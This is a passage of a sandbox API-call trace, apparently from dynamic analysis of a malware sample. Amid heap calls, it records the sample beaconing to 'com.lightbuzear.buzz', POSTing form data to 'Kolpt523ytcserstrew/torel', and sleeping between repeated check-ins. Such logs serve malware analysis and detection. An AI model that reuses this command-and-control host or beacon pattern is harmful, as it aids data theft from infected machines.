[0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eed0 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800848 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0267.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a50 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0267.774] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0267.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0267.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0267.775] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0267.776] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0267.776] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48008c0 | out: hHeap=0x4780000) returned 1 [0267.782] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0267.782] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0267.782] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0267.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0267.782] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0267.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0267.782] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0267.782] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0267.782] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef18 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480efa8 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800910 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0267.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800910 | out: hHeap=0x4780000) returned 1 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800910 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0267.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0267.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0267.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0267.784] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0267.784] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0267.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0267.785] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0267.785] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0267.785] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0267.785] FreeLibrary (hLibModule=0x71570000) returned 1 [0267.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0267.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0267.786] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800690 | out: hHeap=0x4780000) returned 1 [0267.786] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0267.786] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0267.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0267.787] Sleep (dwMilliseconds=0x2710) [0267.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0267.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0267.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0267.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0267.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0267.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0267.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0267.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0267.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0267.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef00 [0267.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0267.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0267.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0267.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0267.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0267.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eed0 [0267.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0267.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0267.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0267.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0267.820] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee10 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef30 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee10 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef30 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48007a8 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0267.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0267.821] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800870 [0267.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0267.822] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0267.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0267.822] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0267.822] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0267.823] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0267.845] FreeLibrary (hLibModule=0x71780000) returned 1 [0267.846] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800848 | out: hHeap=0x4780000) returned 1 [0267.846] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0267.846] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48008c0 [0267.846] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0267.846] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0267.846] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0267.846] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0267.846] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef18 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f008 [0267.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007a8 [0267.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48007a8 | out: hHeap=0x4780000) returned 1 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48007a8 [0267.848] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800848 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0267.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ede0 [0267.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0267.849] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0267.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ede0 | out: hHeap=0x4780000) returned 1 [0267.849] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee88 [0267.849] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800898 [0267.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800898 | out: hHeap=0x4780000) returned 1 [0267.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0267.849] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef00 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee40 [0267.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0267.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0267.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee40 | out: hHeap=0x4780000) returned 1 [0267.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800690 [0267.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0267.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0267.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800690 | out: hHeap=0x4780000) returned 1 [0267.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800938 [0267.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0267.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800898 [0267.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0267.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0267.852] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0267.852] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800898 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eea0 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed98 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48005a0 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0267.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005a0 | out: hHeap=0x4780000) returned 1 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800690 [0267.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0267.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800898 [0267.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0267.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0267.855] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0267.855] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0268.890] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800898 | out: hHeap=0x4780000) returned 1 [0268.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0268.890] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0268.890] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef00 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f020 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef00 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0268.891] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f020 | out: hHeap=0x4780000) returned 1 [0268.891] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800578 [0268.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0268.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0268.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0268.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800898 [0268.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0268.892] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009b0 [0268.892] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0268.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0268.893] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0268.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0268.893] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009b0 | out: hHeap=0x4780000) returned 1 [0268.893] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0268.894] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0268.894] RtlAllocateHeap 